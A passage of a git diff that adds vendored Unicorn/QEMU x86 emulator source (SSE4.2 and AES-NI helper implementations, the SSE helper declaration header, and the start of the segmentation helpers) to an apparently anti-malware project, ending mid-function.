+static inline int pcmp_val(Reg *r, uint8_t ctrl, int i) +{ + switch ((ctrl >> 0) & 3) { + case 0: + return r->B(i); + case 1: + return r->W(i); + case 2: + return (int8_t)r->B(i); + case 3: + default: + return (int16_t)r->W(i); + } +} + +static inline unsigned pcmpxstrx(CPUX86State *env, Reg *d, Reg *s, + int8_t ctrl, int valids, int validd) +{ + unsigned int res = 0; + int v; + int j, i; + int upper = (ctrl & 1) ? 7 : 15; + + valids--; + validd--; + + CC_SRC = (valids < upper ? CC_Z : 0) | (validd < upper ? CC_S : 0); + + switch ((ctrl >> 2) & 3) { + case 0: + for (j = valids; j >= 0; j--) { + res <<= 1; + v = pcmp_val(s, ctrl, j); + for (i = validd; i >= 0; i--) { + res |= (v == pcmp_val(d, ctrl, i)); + } + } + break; + case 1: + for (j = valids; j >= 0; j--) { + res <<= 1; + v = pcmp_val(s, ctrl, j); + for (i = ((validd - 1) | 1); i >= 0; i -= 2) { + res |= (pcmp_val(d, ctrl, i - 0) >= v && + pcmp_val(d, ctrl, i - 1) <= v); + } + } + break; + case 2: + res = (1 << (upper - MAX(valids, validd))) - 1; + res <<= MAX(valids, validd) - MIN(valids, validd); + for (i = MIN(valids, validd); i >= 0; i--) { + res <<= 1; + v = pcmp_val(s, ctrl, i); + res |= (v == pcmp_val(d, ctrl, i)); + } + break; + case 3: + if (validd == -1) { + res = (2 << upper) - 1; + break; + } + for (j = valids - validd; j >= 0; j--) { + res <<= 1; + v = 1; + for (i = validd; i >= 0; i--) { + v &= (pcmp_val(s, ctrl, i + j) == pcmp_val(d, ctrl, i)); + } + res |= v; + } + break; + } + + switch ((ctrl >> 4) & 3) { + case 1: + res ^= (2 << upper) - 1; + break; + case 3: + res ^= (1 << (valids + 1)) - 1; + break; + } + + if (res) { + CC_SRC |= CC_C; + } + if (res & 1) { + CC_SRC |= CC_O; + } + + return res; +} + +void glue(helper_pcmpestri, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + unsigned int res = pcmpxstrx(env, d, s, ctrl, + pcmp_elen(env, R_EDX, ctrl), + pcmp_elen(env, R_EAX, ctrl)); + + if (res) { + env->regs[R_ECX] = (ctrl & (1 << 6)) ? 31 - clz32(res) : ctz32(res); + } else { + env->regs[R_ECX] = 16 >> (ctrl & (1 << 0)); + } +} + +void glue(helper_pcmpestrm, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + int i; + unsigned int res = pcmpxstrx(env, d, s, ctrl, + pcmp_elen(env, R_EDX, ctrl), + pcmp_elen(env, R_EAX, ctrl)); + + if ((ctrl >> 6) & 1) { + if (ctrl & 1) { + for (i = 0; i < 8; i++, res >>= 1) { + env->xmm_regs[0].W(i) = (res & 1) ? ~0 : 0; + } + } else { + for (i = 0; i < 16; i++, res >>= 1) { + env->xmm_regs[0].B(i) = (res & 1) ? ~0 : 0; + } + } + } else { + env->xmm_regs[0].Q(1) = 0; + env->xmm_regs[0].Q(0) = res; + } +} + +void glue(helper_pcmpistri, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + unsigned int res = pcmpxstrx(env, d, s, ctrl, + pcmp_ilen(s, ctrl), + pcmp_ilen(d, ctrl)); + + if (res) { + env->regs[R_ECX] = (ctrl & (1 << 6)) ? 31 - clz32(res) : ctz32(res); + } else { + env->regs[R_ECX] = 16 >> (ctrl & (1 << 0)); + } +} + +void glue(helper_pcmpistrm, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + int i; + unsigned int res = pcmpxstrx(env, d, s, ctrl, + pcmp_ilen(s, ctrl), + pcmp_ilen(d, ctrl)); + + if ((ctrl >> 6) & 1) { + if (ctrl & 1) { + for (i = 0; i < 8; i++, res >>= 1) { + env->xmm_regs[0].W(i) = (res & 1) ? ~0 : 0; + } + } else { + for (i = 0; i < 16; i++, res >>= 1) { + env->xmm_regs[0].B(i) = (res & 1) ? ~0 : 0; + } + } + } else { + env->xmm_regs[0].Q(1) = 0; + env->xmm_regs[0].Q(0) = res; + } +} + +#define CRCPOLY 0x1edc6f41 +#define CRCPOLY_BITREV 0x82f63b78 +target_ulong helper_crc32(uint32_t crc1, target_ulong msg, uint32_t len) +{ + target_ulong crc = (msg & ((target_ulong) -1 >> + (TARGET_LONG_BITS - len))) ^ crc1; + + while (len--) { + crc = (crc >> 1) ^ ((crc & 1) ? CRCPOLY_BITREV : 0); + } + + return crc; +} + +#define POPMASK(i) ((target_ulong) -1 / ((1LL << (1 << i)) + 1)) +#define POPCOUNT(n, i) ((n & POPMASK(i)) + ((n >> (1 << i)) & POPMASK(i))) +target_ulong helper_popcnt(CPUX86State *env, target_ulong n, uint32_t type) +{ + CC_SRC = n ? 0 : CC_Z; + + n = POPCOUNT(n, 0); + n = POPCOUNT(n, 1); + n = POPCOUNT(n, 2); + n = POPCOUNT(n, 3); + if (type == 1) { + return n & 0xff; + } + + n = POPCOUNT(n, 4); +#ifndef TARGET_X86_64 + return n; +#else + if (type == 2) { + return n & 0xff; + } + + return POPCOUNT(n, 5); +#endif +} + +void glue(helper_pclmulqdq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + uint64_t ah, al, b, resh, resl; + + ah = 0; + al = d->Q((ctrl & 1) != 0); + b = s->Q((ctrl & 16) != 0); + resh = resl = 0; + + while (b) { + if (b & 1) { + resl ^= al; + resh ^= ah; + } + ah = (ah << 1) | (al >> 63); + al <<= 1; + b >>= 1; + } + + d->Q(0) = resl; + d->Q(1) = resh; +} + +void glue(helper_aesdec, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg st = *d; + Reg rk = *s; + + for (i = 0 ; i < 4 ; i++) { + d->L(i) = rk.L(i) ^ bswap32(AES_Td0[st.B(AES_ishifts[4*i+0])] ^ + AES_Td1[st.B(AES_ishifts[4*i+1])] ^ + AES_Td2[st.B(AES_ishifts[4*i+2])] ^ + AES_Td3[st.B(AES_ishifts[4*i+3])]); + } +} + +void glue(helper_aesdeclast, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg st = *d; + Reg rk = *s; + + for (i = 0; i < 16; i++) { + d->B(i) = rk.B(i) ^ (AES_Td4[st.B(AES_ishifts[i])] & 0xff); + } +} + +void glue(helper_aesenc, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg st = *d; + Reg rk = *s; + + for (i = 0 ; i < 4 ; i++) { + d->L(i) = rk.L(i) ^ bswap32(AES_Te0[st.B(AES_shifts[4*i+0])] ^ + AES_Te1[st.B(AES_shifts[4*i+1])] ^ + AES_Te2[st.B(AES_shifts[4*i+2])] ^ + AES_Te3[st.B(AES_shifts[4*i+3])]); + } +} + +void glue(helper_aesenclast, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg st = *d; + Reg rk = *s; + + for (i = 0; i < 16; i++) { + d->B(i) = rk.B(i) ^ (AES_Te4[st.B(AES_shifts[i])] & 0xff); + } + +} + +void glue(helper_aesimc, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + Reg tmp = *s; + + for (i = 0 ; i < 4 ; i++) { + d->L(i) = bswap32(AES_Td0[AES_Te4[tmp.B(4*i+0)] & 0xff] ^ + AES_Td1[AES_Te4[tmp.B(4*i+1)] & 0xff] ^ + AES_Td2[AES_Te4[tmp.B(4*i+2)] & 0xff] ^ + AES_Td3[AES_Te4[tmp.B(4*i+3)] & 0xff]); + } +} + +void glue(helper_aeskeygenassist, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + uint32_t ctrl) +{ + int i; + Reg tmp = *s; + + for (i = 0 ; i < 4 ; i++) { + d->B(i) = AES_Te4[tmp.B(i + 4)] & 0xff; + d->B(i + 8) = AES_Te4[tmp.B(i + 12)] & 0xff; + } + d->L(1) = (d->L(0) << 24 | d->L(0) >> 8) ^ ctrl; + d->L(3) = (d->L(2) << 24 | d->L(2) >> 8) ^ ctrl; +} +#endif + +#undef SHIFT +#undef XMM_ONLY +#undef Reg +#undef B +#undef W +#undef L +#undef Q +#undef SUFFIX diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse_header.h b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse_header.h new file mode 100644 index 0000000..a68c7cc --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/ops_sse_header.h @@ -0,0 +1,360 @@ +/* + * MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI support + * + * Copyright (c) 2005 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ +#if SHIFT == 0 +#define Reg MMXReg +#define SUFFIX _mmx +#else +#define Reg XMMReg +#define SUFFIX _xmm +#endif + +#define dh_alias_Reg ptr +#define dh_alias_XMMReg ptr +#define dh_alias_MMXReg ptr +#define dh_ctype_Reg Reg * +#define dh_ctype_XMMReg XMMReg * +#define dh_ctype_MMXReg MMXReg * +#define dh_is_signed_Reg dh_is_signed_ptr +#define dh_is_signed_XMMReg dh_is_signed_ptr +#define dh_is_signed_MMXReg dh_is_signed_ptr + +DEF_HELPER_3(glue(psrlw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psraw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psllw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psrld, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psrad, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pslld, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psrlq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psllq, SUFFIX), void, env, Reg, Reg) + +#if SHIFT == 1 +DEF_HELPER_3(glue(psrldq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pslldq, SUFFIX), void, env, Reg, Reg) +#endif + +#define SSE_HELPER_B(name, F)\ + DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) + +#define SSE_HELPER_W(name, F)\ + DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) + +#define SSE_HELPER_L(name, F)\ + DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) + +#define SSE_HELPER_Q(name, F)\ + DEF_HELPER_3(glue(name, SUFFIX), void, env, Reg, Reg) + +SSE_HELPER_B(paddb, FADD) +SSE_HELPER_W(paddw, FADD) +SSE_HELPER_L(paddl, FADD) +SSE_HELPER_Q(paddq, FADD) + +SSE_HELPER_B(psubb, FSUB) +SSE_HELPER_W(psubw, FSUB) +SSE_HELPER_L(psubl, FSUB) +SSE_HELPER_Q(psubq, FSUB) + +SSE_HELPER_B(paddusb, FADDUB) +SSE_HELPER_B(paddsb, FADDSB) +SSE_HELPER_B(psubusb, FSUBUB) +SSE_HELPER_B(psubsb, FSUBSB) + +SSE_HELPER_W(paddusw, FADDUW) +SSE_HELPER_W(paddsw, FADDSW) +SSE_HELPER_W(psubusw, FSUBUW) +SSE_HELPER_W(psubsw, FSUBSW) + +SSE_HELPER_B(pminub, FMINUB) +SSE_HELPER_B(pmaxub, FMAXUB) + +SSE_HELPER_W(pminsw, FMINSW) +SSE_HELPER_W(pmaxsw, FMAXSW) + +SSE_HELPER_Q(pand, FAND) +SSE_HELPER_Q(pandn, FANDN) +SSE_HELPER_Q(por, FOR) +SSE_HELPER_Q(pxor, FXOR) + +SSE_HELPER_B(pcmpgtb, FCMPGTB) +SSE_HELPER_W(pcmpgtw, FCMPGTW) +SSE_HELPER_L(pcmpgtl, FCMPGTL) + +SSE_HELPER_B(pcmpeqb, FCMPEQ) +SSE_HELPER_W(pcmpeqw, FCMPEQ) +SSE_HELPER_L(pcmpeql, FCMPEQ) + +SSE_HELPER_W(pmullw, FMULLW) +#if SHIFT == 0 +SSE_HELPER_W(pmulhrw, FMULHRW) +#endif +SSE_HELPER_W(pmulhuw, FMULHUW) +SSE_HELPER_W(pmulhw, FMULHW) + +SSE_HELPER_B(pavgb, FAVG) +SSE_HELPER_W(pavgw, FAVG) + +DEF_HELPER_3(glue(pmuludq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaddwd, SUFFIX), void, env, Reg, Reg) + +DEF_HELPER_3(glue(psadbw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_4(glue(maskmov, SUFFIX), void, env, Reg, Reg, tl) +DEF_HELPER_2(glue(movl_mm_T0, SUFFIX), void, Reg, i32) +#ifdef TARGET_X86_64 +DEF_HELPER_2(glue(movq_mm_T0, SUFFIX), void, Reg, i64) +#endif + +#if SHIFT == 0 +DEF_HELPER_3(glue(pshufw, SUFFIX), void, Reg, Reg, int) +#else +DEF_HELPER_3(shufps, void, Reg, Reg, int) +DEF_HELPER_3(shufpd, void, Reg, Reg, int) +DEF_HELPER_3(glue(pshufd, SUFFIX), void, Reg, Reg, int) +DEF_HELPER_3(glue(pshuflw, SUFFIX), void, Reg, Reg, int) +DEF_HELPER_3(glue(pshufhw, SUFFIX), void, Reg, Reg, int) +#endif + +#if SHIFT == 1 +/* FPU ops */ +/* XXX: not accurate */ + +#define SSE_HELPER_S(name, F) \ + DEF_HELPER_3(name ## ps, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## ss, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## pd, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## sd, void, env, Reg, Reg) + +SSE_HELPER_S(add, FPU_ADD) +SSE_HELPER_S(sub, FPU_SUB) +SSE_HELPER_S(mul, FPU_MUL) +SSE_HELPER_S(div, FPU_DIV) +SSE_HELPER_S(min, FPU_MIN) +SSE_HELPER_S(max, FPU_MAX) +SSE_HELPER_S(sqrt, FPU_SQRT) + + +DEF_HELPER_3(cvtps2pd, void, env, Reg, Reg) +DEF_HELPER_3(cvtpd2ps, void, env, Reg, Reg) +DEF_HELPER_3(cvtss2sd, void, env, Reg, Reg) +DEF_HELPER_3(cvtsd2ss, void, env, Reg, Reg) +DEF_HELPER_3(cvtdq2ps, void, env, Reg, Reg) +DEF_HELPER_3(cvtdq2pd, void, env, Reg, Reg) +DEF_HELPER_3(cvtpi2ps, void, env, XMMReg, MMXReg) +DEF_HELPER_3(cvtpi2pd, void, env, XMMReg, MMXReg) +DEF_HELPER_3(cvtsi2ss, void, env, XMMReg, i32) +DEF_HELPER_3(cvtsi2sd, void, env, XMMReg, i32) + +#ifdef TARGET_X86_64 +DEF_HELPER_3(cvtsq2ss, void, env, XMMReg, i64) +DEF_HELPER_3(cvtsq2sd, void, env, XMMReg, i64) +#endif + +DEF_HELPER_3(cvtps2dq, void, env, XMMReg, XMMReg) +DEF_HELPER_3(cvtpd2dq, void, env, XMMReg, XMMReg) +DEF_HELPER_3(cvtps2pi, void, env, MMXReg, XMMReg) +DEF_HELPER_3(cvtpd2pi, void, env, MMXReg, XMMReg) +DEF_HELPER_2(cvtss2si, s32, env, XMMReg) +DEF_HELPER_2(cvtsd2si, s32, env, XMMReg) +#ifdef TARGET_X86_64 +DEF_HELPER_2(cvtss2sq, s64, env, XMMReg) +DEF_HELPER_2(cvtsd2sq, s64, env, XMMReg) +#endif + +DEF_HELPER_3(cvttps2dq, void, env, XMMReg, XMMReg) +DEF_HELPER_3(cvttpd2dq, void, env, XMMReg, XMMReg) +DEF_HELPER_3(cvttps2pi, void, env, MMXReg, XMMReg) +DEF_HELPER_3(cvttpd2pi, void, env, MMXReg, XMMReg) +DEF_HELPER_2(cvttss2si, s32, env, XMMReg) +DEF_HELPER_2(cvttsd2si, s32, env, XMMReg) +#ifdef TARGET_X86_64 +DEF_HELPER_2(cvttss2sq, s64, env, XMMReg) +DEF_HELPER_2(cvttsd2sq, s64, env, XMMReg) +#endif + +DEF_HELPER_3(rsqrtps, void, env, XMMReg, XMMReg) +DEF_HELPER_3(rsqrtss, void, env, XMMReg, XMMReg) +DEF_HELPER_3(rcpps, void, env, XMMReg, XMMReg) +DEF_HELPER_3(rcpss, void, env, XMMReg, XMMReg) +DEF_HELPER_3(extrq_r, void, env, XMMReg, XMMReg) +DEF_HELPER_4(extrq_i, void, env, XMMReg, int, int) +DEF_HELPER_3(insertq_r, void, env, XMMReg, XMMReg) +DEF_HELPER_4(insertq_i, void, env, XMMReg, int, int) +DEF_HELPER_3(haddps, void, env, XMMReg, XMMReg) +DEF_HELPER_3(haddpd, void, env, XMMReg, XMMReg) +DEF_HELPER_3(hsubps, void, env, XMMReg, XMMReg) +DEF_HELPER_3(hsubpd, void, env, XMMReg, XMMReg) +DEF_HELPER_3(addsubps, void, env, XMMReg, XMMReg) +DEF_HELPER_3(addsubpd, void, env, XMMReg, XMMReg) + +#define SSE_HELPER_CMP(name, F) \ + DEF_HELPER_3(name ## ps, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## ss, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## pd, void, env, Reg, Reg) \ + DEF_HELPER_3(name ## sd, void, env, Reg, Reg) + +SSE_HELPER_CMP(cmpeq, FPU_CMPEQ) +SSE_HELPER_CMP(cmplt, FPU_CMPLT) +SSE_HELPER_CMP(cmple, FPU_CMPLE) +SSE_HELPER_CMP(cmpunord, FPU_CMPUNORD) +SSE_HELPER_CMP(cmpneq, FPU_CMPNEQ) +SSE_HELPER_CMP(cmpnlt, FPU_CMPNLT) +SSE_HELPER_CMP(cmpnle, FPU_CMPNLE) +SSE_HELPER_CMP(cmpord, FPU_CMPORD) + +DEF_HELPER_3(ucomiss, void, env, Reg, Reg) +DEF_HELPER_3(comiss, void, env, Reg, Reg) +DEF_HELPER_3(ucomisd, void, env, Reg, Reg) +DEF_HELPER_3(comisd, void, env, Reg, Reg) +DEF_HELPER_2(movmskps, i32, env, Reg) +DEF_HELPER_2(movmskpd, i32, env, Reg) +#endif + +DEF_HELPER_2(glue(pmovmskb, SUFFIX), i32, env, Reg) +DEF_HELPER_3(glue(packsswb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(packuswb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(packssdw, SUFFIX), void, env, Reg, Reg) +#define UNPCK_OP(base_name, base) \ + DEF_HELPER_3(glue(punpck ## base_name ## bw, SUFFIX), void, env, Reg, Reg) \ + DEF_HELPER_3(glue(punpck ## base_name ## wd, SUFFIX), void, env, Reg, Reg) \ + DEF_HELPER_3(glue(punpck ## base_name ## dq, SUFFIX), void, env, Reg, Reg) + +UNPCK_OP(l, 0) +UNPCK_OP(h, 1) + +#if SHIFT == 1 +DEF_HELPER_3(glue(punpcklqdq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(punpckhqdq, SUFFIX), void, env, Reg, Reg) +#endif + +/* 3DNow! float ops */ +#if SHIFT == 0 +DEF_HELPER_3(pi2fd, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pi2fw, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pf2id, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pf2iw, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfacc, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfadd, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfcmpeq, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfcmpge, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfcmpgt, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfmax, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfmin, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfmul, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfnacc, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfpnacc, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfrcp, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfrsqrt, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfsub, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pfsubr, void, env, MMXReg, MMXReg) +DEF_HELPER_3(pswapd, void, env, MMXReg, MMXReg) +#endif + +/* SSSE3 op helpers */ +DEF_HELPER_3(glue(phaddw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phaddd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phaddsw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phsubw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phsubd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phsubsw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pabsb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pabsw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pabsd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaddubsw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmulhrsw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pshufb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psignb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psignw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(psignd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_4(glue(palignr, SUFFIX), void, env, Reg, Reg, s32) + +/* SSE4.1 op helpers */ +#if SHIFT == 1 +DEF_HELPER_3(glue(pblendvb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(blendvps, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(blendvpd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(ptest, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxbw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxbd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxbq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxwd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxwq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovsxdq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxbw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxbd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxbq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxwd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxwq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmovzxdq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmuldq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pcmpeqq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(packusdw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pminsb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pminsd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pminuw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pminud, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaxsb, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaxsd, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaxuw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmaxud, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(pmulld, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(phminposuw, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_4(glue(roundps, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(roundpd, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(roundss, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(roundsd, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(blendps, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(blendpd, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(pblendw, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(dpps, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(dppd, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(mpsadbw, SUFFIX), void, env, Reg, Reg, i32) +#endif + +/* SSE4.2 op helpers */ +#if SHIFT == 1 +DEF_HELPER_3(glue(pcmpgtq, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_4(glue(pcmpestri, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(pcmpestrm, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(pcmpistri, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(pcmpistrm, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_3(crc32, tl, i32, tl, i32) +DEF_HELPER_3(popcnt, tl, env, tl, i32) +#endif + +/* AES-NI op helpers */ +#if SHIFT == 1 +DEF_HELPER_3(glue(aesdec, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(aesdeclast, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(aesenc, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(aesenclast, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_3(glue(aesimc, SUFFIX), void, env, Reg, Reg) +DEF_HELPER_4(glue(aeskeygenassist, SUFFIX), void, env, Reg, Reg, i32) +DEF_HELPER_4(glue(pclmulqdq, SUFFIX), void, env, Reg, Reg, i32) +#endif + +#undef SHIFT +#undef Reg +#undef SUFFIX + +#undef SSE_HELPER_B +#undef SSE_HELPER_W +#undef SSE_HELPER_L +#undef SSE_HELPER_Q +#undef SSE_HELPER_S +#undef SSE_HELPER_CMP +#undef UNPCK_OP diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/seg_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/seg_helper.c new file mode 100644 index 0000000..fd9765a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/seg_helper.c @@ -0,0 +1,2698 @@ +/* + * x86 segmentation related helpers: + * TSS, interrupts, system calls, jumps and call/task gates, descriptors + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "qemu/log.h" +#include "exec/helper-proto.h" +#include "exec/cpu_ldst.h" +#include "uc_priv.h" + +//#define DEBUG_PCALL + +#ifdef DEBUG_PCALL +# define LOG_PCALL(...) qemu_log_mask(CPU_LOG_PCALL, ## __VA_ARGS__) +# define LOG_PCALL_STATE(cpu) \ + log_cpu_state_mask(CPU_LOG_PCALL, (cpu), CPU_DUMP_CCOP) +#else +# define LOG_PCALL(...) do { } while (0) +# define LOG_PCALL_STATE(cpu) do { } while (0) +#endif + +#ifndef CONFIG_USER_ONLY +#define CPU_MMU_INDEX (cpu_mmu_index_kernel(env)) +#define MEMSUFFIX _kernel +#define DATA_SIZE 1 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 2 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 4 +#include "exec/cpu_ldst_template.h" + +#define DATA_SIZE 8 +#include "exec/cpu_ldst_template.h" +#undef CPU_MMU_INDEX +#undef MEMSUFFIX +#endif + +/* return non zero if error */ +static inline int load_segment(CPUX86State *env, uint32_t *e1_ptr, + uint32_t *e2_ptr, int selector) +{ + SegmentCache *dt; + int index; + target_ulong ptr; + + if (selector & 0x4) { + dt = &env->ldt; + } else { + dt = &env->gdt; + } + index = selector & ~7; + if ((index + 7) > dt->limit) { + return -1; + } + ptr = dt->base + index; + *e1_ptr = cpu_ldl_kernel(env, ptr); + *e2_ptr = cpu_ldl_kernel(env, ptr + 4); + return 0; +} + +static inline unsigned int get_seg_limit(uint32_t e1, uint32_t e2) +{ + unsigned int limit; + + limit = (e1 & 0xffff) | (e2 & 0x000f0000); + if (e2 & DESC_G_MASK) { + limit = (limit << 12) | 0xfff; + } + return limit; +} + +static inline uint32_t get_seg_base(uint32_t e1, uint32_t e2) +{ + return (e1 >> 16) | ((e2 & 0xff) << 16) | (e2 & 0xff000000); +} + +static inline void load_seg_cache_raw_dt(SegmentCache *sc, uint32_t e1, + uint32_t e2) +{ + sc->base = get_seg_base(e1, e2); + sc->limit = get_seg_limit(e1, e2); + sc->flags = e2; +} + +/* init the segment cache in vm86 mode. */ +static inline void load_seg_vm(CPUX86State *env, int seg, int selector) +{ + selector &= 0xffff; + + cpu_x86_load_seg_cache(env, seg, selector, (selector << 4), 0xffff, + 